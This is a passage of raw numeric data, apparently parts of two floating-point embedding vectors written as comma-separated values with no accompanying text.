197,0.015481452,-0.020589614,-0.006418337,0.0032887303,-0.018865097,0.016773032,0.015933199,0.0073487675,0.006022071,-0.0010476573,0.0030658408,-0.039117683,0.00783021,0.007771498,-0.014696618,-0.015957387,-0.008546189,0.013700229,0.0063133542,0.023337761,0.0012463713,-0.015722884,-0.0020665813,-0.024779199,0.0072042905,-0.019037792,0.0035199283,-0.011035377,0.005268407,0.04221046,-0.018690225,0.016842542,0.00016607657,-0.00630359,-0.010495386,-0.018430742,-0.007897202,0.0032595757,-0.0024582725,0.031386383,-0.004026762,-0.0034647784,-0.017706564,0.016814543,0.0077632163,-0.019096984,0.0041412497,0.0010329181,-0.0039864155,0.0155743435,-0.015481928,0.041591708,0.0040540155,-0.0032320826,-0.002499206,-0.0021459262,-0.014562621,0.013224649,-0.0057954127,-0.00028576303,-0.011700322,0.032121666,0.008299574,0.014255814,0.009890773,-0.025731632,-0.016567629,-0.036878962,-0.0060328874,0.012942197,0.008196579,0.021878464,0.00521297,0.019707786,-0.001434816,-0.013120892,0.014992882,-0.0039214557,-0.023778569,0.0037918645,-0.002821515,0.0010898284,0.0038663344,0.0036367134,0.0299013,0.007267484,0.03028832,-0.019088374,-0.018596148,0.0067456686,-0.0066541987,-0.013671192,-0.0008859056,0.014463792,0.06134677,-0.009905965,-0.00009454604,0.017475758,-0.020484924,-0.0012469183,0.008322599,-0.0034898242,0.011929972,0.0027615118,-0.00915922,0.0052395766,-0.0056372196,-0.010977177,-0.004838575,-0.01510348,0.020943731,-0.0136467805,0.0004346037,0.016800279,0.0081624435,0.015613106,-0.0259278,-0.033627223,-0.04200552,0.019364057,-0.0046525733,-0.009958586,-0.01506064,0.00029118557,0.018329779,-0.002001256,0.015332775,-0.01410385,-0.0009187623,-0.01664488,-0.020086102,0.021888433,-0.013158759,-0.0034677149,0.001992863,0.005464372,-0.024183769,-0.028115202,-0.0013683192,0.010238091,-0.024533525,-0.012117542,-0.002150223,-0.006370433,-0.014876424,0.0026580077,0.0031217777,0.01587425,-0.021352325,0.020432206,0.027609907,-0.0006288643,0.017826065,-0.0061644334,-0.029467175,0.01113849,0.0075161243,0.010843074,-0.010213008,0.0131988125,0.014901889,-0.020451738,-0.015879428,-0.021921623,-0.021146739,-0.01482024,0.014593318,0.0073581696,-0.00522707,-0.000042036674,-0.008501645,-0.012241033,0.0027641072,0.02796626,0.005156475,0.0037173913,-0.017992292,0.010133637,0.017095406,0.008815667,-0.011424092,0.012788609,0.014678297,-0.026067406,-0.0013927406,-0.013564457,0.01899526,-0.004735877,-0.010709451,0.0054507195,-0.004842942,0.0026866603,-0.02768739,0.014478238,0.025577497,-0.031501994,0.012281181,0.030599486,-0.011795877,-0.009649846,0.002764687,-0.009338309,0.012786062,0.0029968116,0.011373625,0.012426744,0.030274056,-0.021580672,0.0075386586,-0.0042082914,-0.017506965,0.011577395,-0.007484831,-0.0046912096,-0.006633889,-0.019877503,0.0068397154,0.0010112739,0.018544404,0.017337233,0.0053936737,0.034506667,0.011484383,-0.020211441,0.008141067,-0.0021390705,0.008588774,-0.008094174,0.0002696705,-0.026127292,-0.027474165,-0.0029487559,-0.0036450347,-0.005181344,0.0014649308,-0.0025456334,-0.0060449643,-0.014898412,0.0031023256,0.020777602,0.0081532765,-0.010558099,0.00061387586,-0.014575345,0.007503274,-0.014529678,-0.019308276,-0.0038627994,0.01660124,0.027084788,0.0021900947,-0.02122229,-0.017990803,0.0024418358,0.0022745612,0.015616991,0.009503173,-0.014746364,0.020700993,-0.032714978,0.015467463,0.026622038,-0.0054361797,-0.024639778,0.008320017,-0.009080354,-0.00583862,0.007817344,-0.013903442,-0.008703832,-0.011708585,-0.023937816,0.019118898,-0.0009655841,0.01412678,-0.039118636,0.024281653,-0.0041674506,0.0051131835,-0.032030426,-0.019115461,-0.040924095,-0.016137082,0.018963128,-0.029435435,0.0025100478,-0.009350414,-0.0038113557,0.0029759663,-0.0196804,0.0012813003,0.016751789,0.0008272595,0.0014776073,0.0011420059,0.03609275,0.014276541,-0.004780715,-0.012167591,0.006253333,-0.0004249513,0.016978402,0.00089129776,0.009571807,-0.02678945,-0.0019197308,0.0023447913,-0.0076581114,-0.019923607,0.012947794,0.0037325579,0.028421931,-0.00248878,-0.029362366,-0.009046055,0.006025438,0.0013105343,-0.032520603,0.07281389,-0.0021396503,0.006648836,-0.00030229878,-0.0029244567,0.0018205723,0.013785417,-0.0070963553,0.034279004,0.012301743,-0.0037031674,-0.0095917275,0.009436091,0.014326959,0.009355414,0.021946033,-0.012532362,0.010349816,0.012105111,-0.0009156229,-0.014058275,0.020879235,-0.011295504,0.002824883,0.019262701,-0.012193512,0.00026489035,-0.015624974,-0.0019587371,0.024134036,-0.017279046,-0.019945929,0.00761132,-0.011161127,0.034040313,-0.0029550865,-0.0068961116,0.022983143,-0.0023165115,-0.03352223,0.020517545,-0.0012885503,-0.00037873694,-0.010490393,0.023717435,-0.003369434,0.07345228,0.008751219,0.0035905386,-0.01927748,-0.007146617,0.013738294,-0.01683809,0.023102086,0.011292347,0.006981198,0.0187257,0.033122495,0.014623076,-0.0094609475,0.01130384,-0.015942616,0.0037315546,-0.006342282,-0.0014104473,-0.0088460315,-0.017833568,0.01693184,0.0004915094,-0.02201544,-0.02176014,0.014249161,-0.0028972994,-0.0034152975,-0.0000782588,-0.014132868,0.006158725,-0.0049895775,0.009213159,0.040430453,0.009580918,-0.05748348,-0.01997431,0.21651505,-0.0061661582,0.022234527,0.03618763,-0.002081252,-0.0047203125,-0.08549221,-0.011900182,-0.0045082597,-0.010866354,-0.021364074,-0.019662851,-0.012240418,0.024687668,0.0054508112,0.03135023,0.009322959,-0.03549133,0.011809503,-0.015878588,0.0023774803,-0.008244443,0.024479661,-0.006117863,-0.007757074,-0.0054928167,0.024509953,-0.014039917,-0.011593587,0.020715307,-0.010461102,-0.009429194,0.0009726628,0.019066777,-0.027245132,0.0037170898,0.0127386525,-0.0063540195,-0.019910295,-0.029536262,-0.0048633744,0.004358954,-0.01130908,0.0016030563,-0.15780939,0.0008150874,0.033520702,-0.03001926,0.013826721,0.0008172251,0.0071714073,0.018906306,0.0046038767,-0.021949636,0.0011687479,-0.01698482,0.013127462,-0.015883924,0.011635547,-0.010812216,-0.010796718,-0.00018704523,0.017934494,0.014082061,0.026839223,0.00196945,-0.0147346435,0.004634454,0.01556229,0.008906437,-0.013016048,0.014838903,-0.004695652,0.013767139,-0.017393516,-0.0005348626,0.0019246469,0.0043884055,-0.034598455,-0.020938197,-0.01194938,0.016600106,0.0044592037,-0.002078337,-0.00022077971,-0.008927018,0.005872987,-0.02032411,-0.013234803,0.036720816,0.020814938,0.00066639314,-0.0028619487,0.004359408,0.04782382,0.0010949003,-0.009433972,-0.026383717,-0.010571998,-0.014312585,-0.024238022,-0.034895252,0.0032513826,0.0022052776,0.009917854,-0.015609721,-0.023362238,-0.017937604,0.019135596,-0.02645812,-0.0064981184,-0.021119503,0.011403136,-0.025631512,0.0038181571,0.011749161,0.00091906526,-0.021771038,0.005270046,0.024491766,-0.008600836,-0.0085870195,-0.0032979774,0.00054747344,-0.030135075,-0.016069487,0.0063563613,-0.00462689,-0.013991567,-0.001434881,0.0063948818,0.014345486,0.011631141,0.006954926,-0.009112628,0.005498342,0.01565936,0.0040886644,-0.030820912,-0.0031226375,0.023664366,0.018105026,-0.017198436,0.0092384955,-0.0020105587,0.0071754344,-0.017145127,0.016010355,-0.013525833,0.0094798505,-0.0009097097,-0.01458652,-0.033491332,-0.01704648,0.00534217,-0.00960488,0.003120577,-0.03201748,-0.008341285,-0.013813116,0.03056316,0.020384498,0.004867253,-0.009459881,-0.032963216,-0.010193245,-0.015629563,-0.008607288,0.03477111,-0.016467016,-0.027146267,0.0019137581,-0.0037113116,-0.03812984,-0.010214738,-0.010667177,-0.007695527,0.011187432,-0.00802175,-0.015120693,-0.020894064,-0.009365561,-0.008549933,-0.0037344894,0.0075518265,-0.025267407,-0.0080918595,-0.0078048958,0.020568296,0.012985474,0.022736792,0.0091871545,0.015256549,-0.0040402487,0.008535263,0.030324733,-0.0117010735,-0.010571342,-0.009308866,0.08930018,-0.0030183245,-0.019693378,0.020327562,0.00784461,0.007721645,0.027487032,-0.016920209,-0.0061181476,-0.025272507,-0.040540628,0.019336741,-0.008276093,0.0016036385,-0.01958882,0.046225287,0.0025028912,0.013415078,0.007923317,0.028335549,0.00989476,-0.004271596,-0.02176543,0.030270744,0.04653672,0.0047056577,0.0035847542,-0.0006627011,-0.017369295,0.0059978785,-0.009388391,-0.0044993088,-0.005344194,-0.009848501,0.0071043447,-0.03738441,0.0032566837,-0.0068385056,0.005528879,-0.014685756,0.008647278,0.0073139886,0.010255178,-0.0051381188,0.012067456,0.01398827,0.001524403,0.029229091,-0.010252722,0.0063888044,-0.0032774527,0.0034425063,0.015026632,-0.024132775,0.015031065,-0.019620622,0.0000313819,0.013698353,-0.0074619018,0.0056860177,0.032129746,-0.02558279,0.005986957,-0.0017195089,-0.0104889525,0.010516268,0.0031786566,0.035883717,0.009110418,0.03199107,-0.0047821454,-0.009248584,0.0012310771,0.017605018,0.0016779539,-0.0040158113,-0.01606332,-0.015513271,-0.01759749,0.0077123167,0.020177197,-0.0053138607,0.0063408175,0.00789958,-0.0065629547,-0.0507823,0.00014964463,-0.01793367,-0.015935939,0.03372386,-0.0037754863,0.0042331344,0.0289773,0.008315071,0.0034668392,0.009176805,-0.008069425,0.007885169,0.014654399,-0.011751108,0.017171796,0.018813696,-0.0021550155,-0.0051999735,-0.0019998306,-0.010194606,-0.0013852481,-0.0065337317,-0.0013473271,-0.025652444,0.01350177,-0.011760568,0.021321584,-0.017449938,0.014209372,0.058853097,-0.027471809,-0.011911948,0.0067041228,-0.014871823,0.0036449581,-0.012607501,0.0023499674,-0.0005163563,0.037176773,-0.0063794963,-0.00501326,0.027737934,-0.011992837,0.006188497,-0.026098076,0.02215119,-0.009991424,-0.0018817104,0.046377108,-0.0037442846,0.014841333,-0.00070551824,-0.0046361615,0.025976194,-0.0035179611,0.0071555516,-0.013790566,-0.002096928,0.00303896,0.00443785,-0.0027008571,-0.009371155,-0.008261397,0.014758752,-0.0047376244,-0.0069663003,0.016059332,-0.0038133548,0.0032023697,0.01067111,-0.018939635,0.02672892,0.007763936,-0.015413564,-0.015162664,0.02748761,-0.0018802417,-0.028811285,-0.0013961582,0.02240603,0.006629406,-0.020887347,0.03540384,0.0031544263,-0.017050982,-0.03078629,0.014036606,0.005456805,-0.009907344,0.015284988,0.0047524516,-0.0037259182,-0.033179212,0.015348135,0.029205805,0.018041851,-0.035774324,0.008728974,0.01541528,-0.0013338948,0.007436706,0.02565249,0.013533347,0.0047613536,0.00870617,0.0031552862,0.026387766,-0.011689588,-0.02698348,0.009536192,0.022548707,-0.019420333,0.011951795,-0.0009135453,0.0042009884,0.013636927,-0.010387775,-0.028774466,0.014795032,0.012684585,-0.009890192,0.0223525,-0.016971111,0.010571189,-0.015939293,0.0070687495,-0.008173687,-0.011838037,-0.008961902,0.010770884,0.0135628255,0.017391196,-0.025504619,-0.012017354,-0.020213332,-0.005458264,0.002406862,-0.0017853299,-0.041758392,-0.012871123,-0.022078421,0.07047208,-0.012810455,-0.02620094,0.008904752,0.036099505,0.026967613,-0.0004146746,0.0080045,-0.028232409,-0.012456677,-0.011041879,-0.01952411,-0.00030439274,0.0020201562,-0.0052459086,-0.025899809,0.011713807,0.004020291,-0.016914045,-0.013553895,-0.021837246,0.00010486667,0.0006137809,-0.0040848805,-0.023411388,-0.027991928,-0.017203972,-0.005281094,-0.035148073,-0.0019821788,0.008367273,0.00009873428,-0.027275622,0.0013567602,-0.011316891,-0.016648699,0.017111726,-0.0086824605,-0.018055856,0.022605818,-0.012824621,0.007110222,0.009872421,-0.01223376,-0.027522393,-0.0142569505,0.019497056,-0.024687352,-0.015410453,0.023417007,0.0048263976,0.02235691,0.0041722753,0.0023354634,-0.0043779598,0.01658256,-0.0029726021,-0.024941187,0.0076763616,-0.0017096874,0.00905949,-0.015718034,-0.005103957,-0.015055641,-0.00065126066,0.0025385947,0.005140242,-0.013539718,-0.021376133,0.009660693,-0.00079236453,0.044221275,0.0018322241,-0.00069921976,0.0009303456,0.0044664503,0.006880016,-0.0013279471,0.008797194,-0.009233052,0.0071839807,-0.0074629383,-0.0074177473,0.008144627,-0.012838169,-0.016443262,-0.027578397,-0.0153946495,0.0020042344,-0.0034546186,0.019117534,-0.007923559,-0.009362561,0.0047711553,0.0055830507,-0.012742021,-0.0008832323,0.009159156,-0.004613143,-0.03964646,0.021900782,0.0075411736,0.010160753,-0.022401178,0.0006528177,0.0281482,-0.14898339,0.017097706,-0.027249811,-0.009643548,0.0018805133,-0.010181253,0.012332184,0.060173444,0.015153928,-0.013824964,-0.0015073653,0.02041998,0.007342838,-0.0030484747,-0.009962411,0.016986938,-0.02041956,-0.0030802288,-0.00054113084,0.015253359,-0.004519372,0.0052190414,-0.0077731716,0.0065298607,-0.010146777,0.008497679,-0.0064845923,0.010239896,0.02600908,0.0132105565,-0.022154992,0.0053567686,0.010909793,0.0036066647,-0.013642806,0.027203579,-0.02091721,0.00092790753,0.008114676,0.0024008655,-0.013378496,-0.010464071,-0.009092232,0.017684998,0.02520081,0.002369105,0.018212704,0.0058410224,0.011313578,-0.008917812,0.017822415,-0.017916963,0.023229174,0.01811404,0.0019185137,0.010250376,-0.023521883,0.020027963,0.024232432,0.0005861871,0.008519215,0.01833515,0.026528988,-0.006010541,-0.007592068,-0.014696054,0.003702258,-0.024186328,-0.018692633,-0.0045091496,-0.009550377,0.011449066,-0.005090211,0.01774293,-0.009007147,0.0014818826,0.030360566,-0.004367962,0.021783885,0.020100385,-0.0010233325,0.0054763397,0.0018137028,0.033483177,-0.009492296,-0.0005553064,-0.025348894,-0.0019040892,-0.0054876315,-0.024210017,0.0055702813,0.003783173,-0.017165795,-0.0046272753,0.0062572244,-0.019362718,-0.0025080561,0.022255916,0.0042593037,-0.004092758,-0.004616157,0.0023440304,0.008231413,-0.02190913,-0.117570855,-0.020888627,0.015991582,-0.012741539,-0.028866552,0.009520123,-0.015206726,-0.0055948338,0.0117404945,0.0022051774,-0.0070566074,0.014968881,0.017278623,-0.0015821767,-0.009853407,0.00348902,-0.034184586,0.008802989,-0.019454991,-0.020304311,0.024724016,0.0043882383,-0.029517695,-0.008812861,0.007953125,-0.007771462,0.004603646,0.015291122,0.003669401,-0.010694141,-0.014736349,-0.007431968,-0.013908932,0.004447743,-0.014854835,-0.006467873,0.007324387,0.008485031,-0.01656031,-0.00088322436,0.0131557565,-0.0068689636,-0.0066109,-0.0061332295,0.003342051,0.0039882474,0.005567994,0.003273985,0.0030584245,0.0148153175,-0.008034008,0.013044472,-0.011919057,0.010970061,0.0038100635,-0.020248024,-0.022296594,-0.009979114,-0.001384336,0.0043650614,0.0033986885,0.027452521,0.010519814,-0.0135272285,-0.0093590105,0.032347247,0.0025153642,-0.003721303,0.021808112,0.0010425241,-0.010226683,0.036985714,0.0076130624,0.002006822,0.03295605,0.01107653,-0.0036437497,0.012688918,-0.0003559275,-0.0023637153,-0.020498184,-0.011488148,-0.0129992105,0.01999121,-0.009483128,-0.0041376213,0.010873552,-0.002001237,0.003951237,0.03251564,0.016261559,0.027100006,-0.0042327065,0.00650405,0.012568409,0.02906988,-0.0023831888,0.013585829,-0.015060262,0.003608128,-0.028702395,-0.0006036067,0.004458514,0.0076043196,-0.01612956,-0.019021748,0.0033695593,-0.009369208,-0.007288492,0.0063401507,0.012571593,0.03288538,-0.02035954,0.0009968303,-0.012148892,0.0035726102,-0.0157575,-0.0064755725,-0.0018692992,0.015320193,-0.0072985054,0.03419191,0.0036447204,-0.0020676046,-0.022749314,0.0057546655,-0.019735543,0.011779738,-0.014978878,0.015952569,-0.008805959,-0.001807249,0.0048106387,-0.030936074,-0.0045169853,0.006879456,0.003954107,-0.01832043,0.019253626,0.0037660354,0.0030354124,-0.008419971,0.006029396,0.011016969,-0.020624869,-0.03323628,0.023511667,0.0058844755,0.005189854,0.0053312904,-0.0007660222,-0.01315774,0.009924074,0.015460687,-0.0021590614,0.011114487,-0.0047683734,-0.00042789077,0.0053192605,-0.0006926157,-0.007144961,0.010692887,0.00836426,-0.0024105925,0.00011113845,-0.01264058,0.0020095906,-0.009535446,0.011002384,-0.013052862,0.040840972,-0.00615361,0.0045009167,0.025451053,0.01386427,0.017935688,0.025970422,0.026727758,0.011153714,0.015551708,0.017018802,0.021642411,0.015025333,-0.0021937035,0.004516888,0.0014858447,-0.007563205,0.021398228,0.005532228,-0.018618932,0.024954861,0.02133868,0.01512472,-0.0025538309,0.010405365,0.009148644,-0.0012953763,-0.029987555,-0.0036604395,-0.03219678,0.017321493,0.01623328,-0.007213157,0.00530096,-0.01758981,0.013369517,0.006309445,-0.0004130607,0.012784047,-0.0034046036,-0.003076941,-0.008857131,0.0037180667,0.017119525,0.013465771,0.014194419,-0.03298149,-0.01819651,0.02017949,-0.0013913976,-0.012414335,-0.030682914,0.01918269,-0.009541699,-0.01981535,0.032974813,0.009160125,0.017344298,0.013343848,-0.0056523364,0.014337242,0.019464448,-0.010862957,0.016106796,-0.033704534,0.009450587,0.010389584,-0.006461062,-0.006570638,-0.025172824,0.010469302,0.027068399,0.023649795,0.0115060145,0.014667442,0.015412771,0.012537932,-0.008337463,-0.006724067,0.015793087,0.008147388,0.005897379,-0.007466198,-0.01075276,-0.023545874,-0.015461874,0.015430798,0.017815629,0.019597974,-0.013204547,-0.0077953306,0.0020610485,0.013553185,0.016070418,0.00716893,-0.016609423,0.010857392,-0.025749257,-0.006927497,-0.013973216,-0.005896353,-0.00909801,-0.02024466,0.0058200504,0.025437182,0.0043481663,-0.025731925,0.016995387,0.0036611306,-0.0011990655,0.012670725,-0.025770847,0.0020191006,0.007098779,0.0012413652,-0.0070684883,-0.016734218,-0.0043636765,0.008087469,0.0010482586,0.0071631507,-0.00997766,0.002932037,-0.003864094,-0.0057505784,0.0019443969,0.019511119,-0.014043051,-0.0033414457,0.006731665,-0.004128549,-0.0064342264,-0.0035618206,0.0028689469,-0.015037228,-0.011796191,-0.005474443,0.0064619686,-0.029592693,-0.0123599805,0.0093758395,-0.0045844526,-0.007460518,0.016207771,0.006293581,-0.0038062127,0.0023965198,-0.0059746206,-0.004487987,-0.00610719,-0.00224403,-0.017710365,0.013707395,0.015391011,0.004816436,0.014510677,0.009449264,-0.018734522,-0.019779067,0.008624046,0.02377966,0.061801974,-0.008874454,-0.026164964,0.019528959,-0.0009239452,0.0059875413,0.015670326,0.0031222422,0.016726578,-0.0012954362,0.0060595693,0.0046025254,-0.016216286,-0.00029340724,-0.01362741,-0.0068119597,0.0039136154,-0.009546087,0.003140742,-0.0018879818,0.013014735,0.006052384,0.005016926,0.0025744226,0.008299958,-0.015533797,-0.009113339,0.012529383,-0.007727233,-0.032585908,-0.01003998,-0.008459913,-0.005139219,0.011036482,-0.007710133,0.007830318,0.009520546,-0.034133036,-0.0042228224,-0.010280643,-0.01565295,0.0030932473,-0.003843655,-0.009139383,-0.063671745,-0.017681547,0.013861145,-0.013535561,0.009295947,0.019653313,-0.024345648,0.0025587014,-0.006942899,0.017852958,-0.016572738,-0.005175558,0.0063023176,0.034723558,0.024646293,-0.001958077,-0.0049487385,0.013401725,-0.0050854585,-0.0021603054,-0.012797916,0.025023349,0.017594242,0.01061887,-0.0064850557,-0.002274347,0.0028910786,-0.012673862,-0.007029074,-0.0052455724,-0.015607874,-0.020657392,-0.023323888,-0.019612342,-0.0051498585,0.0022738616,-0.018990923,0.0029430096,0.0075884513,-0.019162506,-0.00529283,-0.003103786,0.017165251,-0.0132914735,0.0017173913,0.027551383,-0.024640258,-0.020415088,-0.020887611,-0.001151783,0.004396083,0.012968751,0.00059159414,0.009082396,0.0045664585,0.007451425,-0.019338144,0.012231416,0.018536298,0.0054723034,-0.02417707,-0.012607182,0.022970269,-0.010802897,0.01597288,0.00906324,-0.0026898815,0.03626162,-0.008020975,0.004841357,-0.004501849,-0.017095782,0.0035678735,0.010305422,-0.008061937,0.012316634,0.008528706,-0.023469092,0.0031062257,0.019315628,0.0043204795,0.007201604,0.0045700753,0.012253302,0.00057282404,-0.0024197327,0.008770205,0.0067003886,0.04245415,0.0061272234,0.011288391,-0.019505145,0.004100291,-0.018489227,-0.00813538,0.0058403076,-0.005525906,-0.0121050235,0.0143522285,0.003298092,-0.009225471,-0.026001928,0.020671293,0.015994435,0.0010036589,-0.011966142,0.014871596,0.02409359,0.005188804,0.012282881,-0.0112749,-0.0129203275,0.01569949,0.027442386,0.0141144665,0.0044073267,-0.0057272166,0.005422868,0.0065329103,-0.0009929037,-0.0072101043,-0.011314207,-0.026251065,-0.00037045765,0.02450826,-0.00407675,0.0033243124,-0.002478305,0.0052578608,-0.0015041069,0.0039306968,0.017541332,0.008655,0.016524434,-0.0047196792,0.01797008,-0.019197326,0.0066064363,-0.01805721,0.010154823,-0.02765968,-0.030924523,-0.018260982,-0.0054791733,0.008108255,0.024827885,0.0010193209,-0.013612063,-0.006647267,0.011753482,-0.0033696836,-0.017646031,-0.0002701467,-0.009593725,-0.0061583477,-0.011878404,0.013069313,-0.008183142,0.011304673,-0.018719804,0.006727745,0.010667215,-0.010370243,-0.016280198,-0.026591474,0.0014781359,0.022414263,0.0048538023,-0.012760827,-0.026972817,-0.0049625547,-0.0036252714,0.010910077,-0.009854449,0.002022665,0.0029750897,0.014618283,0.005173468,-0.008719417,-0.009903486,-0.010904509,0.015018461,-0.010620461,0.0025524371,-0.023895813,-0.003642916,-0.010328015,0.007849948,0.0007412067,-0.019092022,-0.0010064662,0.007408595,0.0013152083,0.008099384,-0.01774329,0.0013127044,0.0071998877,-0.0009192724,-0.034628067,0.015586654,-0.0034683535,0.011846831,-0.008776059,0.0049725748,-0.008145442,0.016851915,-0.009330154,-0.009299133,-0.012342601,0.0028992046,0.023849523,0.013149024,-0.009524403,0.09992478,0.029660968,-0.015994629,0.014767907,-0.010226678,0.009823091,0.02732917,0.004918522,0.007727399,0.021251833,0.00674508,-0.008251833,0.029672783,0.0020296443,-0.0052622613,0.012728326,0.03016156,0.033114105,0.007983322,-0.010469756,0.011539534,-0.03353393,0.007845897,0.0114890495,0.007270855,-0.037617486,-0.009679228,0.028681839,0.0028909321,0.0148072615,0.006505049,0.0015200649,0.00062581926,0.0076075364,-0.012303687,0.00027356663,-0.006359781,-0.010771448,-0.006895772,-0.021993617,0.015666164,0.011526872,0.021235356,-0.017005838,-0.020782843,0.03287083,-0.005271739,-0.023717014,-0.004580389,0.0056300685,0.024377568,0.022808252,0.009688374,-0.0024890793,0.007483945,0.006863809,0.0052960864,-0.013916874,0.0015052423,-0.026739385,0.020996349,-0.009077995,0.0013521307,0.0041562263,0.013119195,0.0066439332,-0.01077672,0.003913717,-0.046475668,-0.026671054,0.03248496,0.00033478465,-0.0059138574,-0.0058677993,-0.0145264575,0.0065987934,-0.008297462,-0.034474164,-0.0067463275,-0.019011488,-0.0067030373,0.005262602,0.013110604,-0.0050426517,-0.009988119,-0.0045115226,0.0054729553,-0.009621656,0.022385785,0.009846614,0.016760195,-0.005633146,0.0028124508,0.00049295777,-0.033202063,-0.015071049,0.018402262,-0.019017728,-0.0144414315,-0.0046067005,-0.005037305,-0.006757252,-0.0025679604,0.0097814435,-0.018943278,-0.01046483,0.00058324734,0.013944673,0.008487817,-0.019376637,0.0016528745,-0.0030211527,0.007171336,0.007960858,0.004509293,0.008831011,-0.01634378,-0.028719768,0.029790012,-0.014321499,-0.021151172,0.019126186,-0.0008967529,0.019368134,-0.016455906,-0.007831151,-0.026001668,0.021518214,0.0090889735,-0.0028603456,0.015966296,-0.032233026,-0.01713437,-0.013921509,-0.0018114895,0.006851248,0.023055378,-0.0057999105,0.008478689,0.006698013,-0.008101831,0.014033341,-0.0058856434,-0.008205952,-0.0069535654,0.00030948146,0.020275082,-0.02026035,0.030169042,-0.0073140496,-0.029546367,-0.0057867486,0.0038497539,-0.0016604371,-0.008416427,-0.011487619,0.017301196,-0.016275125,-0.027497511,0.020236043,-0.0069480552,0.003729049,-0.0010625933,-0.04796953,-0.0067712497,0.003977832,0.012333024,0.011616484,-0.0035465765,0.0056573227,-0.007942479,-0.005685819,-0.010001979,0.013070168,-0.027176978,-0.008974687,0.011909359,0.012517263,0.0014153282,-0.00030170038,0.012498706,0.035789672,0.00093499094,0.020136101,0.0068980004,-0.023840157,0.009711131,0.013999951,-0.011313685,0.033046104,-0.0062076095,0.034514166,0.0053443173,0.01244279,-0.0007880616,0.0021769174,-0.02452386,0.05118806,-0.0022480623,-0.03984834,-0.0066079246,-0.023619434,-0.009341583,-0.0034250948,0.011009222,0.0053060423,0.0071622906,0.010811376,-0.0031511048,0.01602812,0.0143792555,0.0043408186,0.01285822,-0.007254842,0.0054084808,0.0068411357,-0.018905986,-0.0059216893,-0.020416357,0.002596031,-0.0006451878,-0.019843802,-0.0066894274,0.0065964563,-0.0004534293,-0.007984962,0.009755095,0.04464472,0.028862169,-0.015846783,-0.002342803,0.0149020385,-0.016683532,-0.012078208,-0.009902656,0.0027943444,0.025545612,0.009509232,0.0041831196,-0.011978419,0.0063922126,-0.011223398,-0.0028103215,0.015070163,-0.007988821,-0.00017829861,0.016399944,0.019766077,-0.012810308,-0.042695448,-0.030482147,0.019394211,-0.029499987,0.005674782,-0.0277715,0.006597726,0.009671422,0.024593769,-0.00027263662,-0.02009214,0.002984273,0.0069507086,0.004407736,0.01170342,0.007354903,-0.0107160965,0.024461437,-0.011764777,0.00077864743,0.011804933,-0.020567533,0.008932898,-0.024849426,0.008029027,-0.020041518,-0.0018837882,-0.010718989,-0.001483412,-0.02258895,0.00565172,0.0019197919,-0.025359958,0.019576544,-0.010916858,-0.0009681819,-0.004325389,0.020576097,-0.011817294,0.029636886,-0.03551336,0.0025397681,0.03561375,0.017151428,-0.013020869,0.010376254,0.018117411,-0.06880515,-0.0020620548,0.028178316,0.01129981,-0.011652369,-0.030861,0.02223759,0.0023739834,-0.030450808,0.0039993897,0.00818392,0.022308119,0.004679669,0.019918779,0.008796465,0.000019855019,-0.0055219885,-0.017033147,-0.012566324,-0.010745332,0.0073645823,-0.011335953,0.008121834,0.0045449217,0.015685607,-0.011439908,0.017369894,0.003365946,0.00610011,0.0023189934,0.011441441,-0.0042340085,-0.028080089,-0.0148180965,0.0066618505,-0.030056328,0.011504213,-0.017879775,-0.013923122,-0.011849446,0.0047077034,0.16874518,0.031380236,-0.006860933,-0.01950099,-0.012772355,-0.027400825,-0.0068340804,0.009513883,0.011857125,0.005908904,-0.01687869,-0.002417733,0.0043504313,0.0005303794,0.020425811,-0.009454425,0.0077063413,0.15160728,0.0039335587,0.035478268,0.008163231,-0.008579436,0.014974888,0.01408689,0.008324254,-0.044738483,-0.017344505,-0.030183617,0.010442147,-0.014699544,0.010464664,0.03984671,-0.022278495,0.0077205743,0.010314275,0.017106758,-0.020258345,-0.020077577,-0.011268253,0.009967218,0.00585259,-0.008940156,-0.0105180405,0.01068707,0.005212991,0.009417243,0.015809905,0.0037451857,0.0072820564,0.03704386,0.009792302,-0.0142149,0.014666837,-0.021644732,0.00042201654,0.0016696814,-0.009644818,0.007532085,0.0014933924,0.035978258,0.023118187,0.016085993,0.002122546,-0.0021771938,-0.02156324,-0.011340666,0.011562803,-0.01133615,0.007080327,0.015783641,-0.008341956,0.0023407543,-0.006234782,0.012751603,-0.0036471142,0.0010667369,-0.01752621,-0.018028447,0.008184805,-0.0408079,0.028615063,0.03640421,-0.01855952,0.009916767,0.0387699,0.022430696,-0.020987883,-0.008155796,-0.009429268,0.0045924517,-0.010888968,0.0064623873,0.012752578,-0.015371434,-0.012720142,0.021892698,-0.006063622,0.0056585977,0.02280402,-0.0062343287,-0.0030921255,0.027045548,-0.008558131,0.016375763,-0.018575255,0.025973313,-0.011373271,-0.0010704139,-0.022591421,-0.009609704,0.0028529225,0.0027731264,0.010671914,0.012243217,-0.0018833077,-0.010368356,-0.00041756817,0.01874115,-0.040659674,-0.021403128,0.005875849,-0.009255209,0.022299062,0.03382928,-0.023204567,0.002445535,0.0037617295,-0.009687882,-0.031131323,-0.0011923573,-0.008445172,0.022314431,0.028093377,0.025879404,0.0235523,-0.02163913,-0.0033943993,-0.022513373,-0.0029756173,-0.012285474,-0.009544918,0.006317762,-0.001790751,-0.0006283145,-0.025004767,0.0010800002,0.013777236,0.0059963735],[0.019689068,-0.010817369,-0.010208037,-0.009453036,-0.01473062,-0.029542781,-0.013199253,0.013430578,0.00058783806,0.0009796666,0.0111575695,0.0054352116,0.005573525,0.0074431463,-0.015393625,-0.015153433,0.010755947,0.0022172343,-0.006512266,-0.018483924,0.0049161077,-0.014281045,-0.0022440176,-0.0026213457,0.006222714,0.008351074,-0.0050813733,-0.0012507278,0.0014083624,-0.021003608,0.012933466,0.033052072,-0.0136805065,-0.010771718,0.00076430506,-0.008858721,-0.0030864107,0.008996565,0.013513563,-0.004086586,0.006161597,0.004093624,-0.010712851,0.012343285,-0.009967787,-0.013716643,-0.018977322,0.01215227,-0.012001657,-0.0017568951,0.008424948,-0.0016600129,-0.025809381,-0.0028109523,-0.01740982,0.0031916646,-0.0065740957,-0.014935626,0.031620234,-0.003732089,-0.014912922,0.023422142,0.009462579,-0.0007524912,0.03995073,-0.03565753,0.011466237,0.0031609864,-0.02610215,-0.0038967247,0.02947325,-0.022376176,0.004594848,0.009294298,-0.0013351862,0.011110446,-0.012328274,-0.007663027,-0.01001726,-0.02037025,-0.019231908,-0.008699565,0.0030521862,-0.020274779,0.0013322489,-0.019018466,0.004178918,-0.010354366,-0.0015096362,-0.013296286,-0.017951315,-0.0001792387,-0.010683473,-0.007673591,0.005801185,0.01354931,0.039254833,-0.008202791,0.01089011,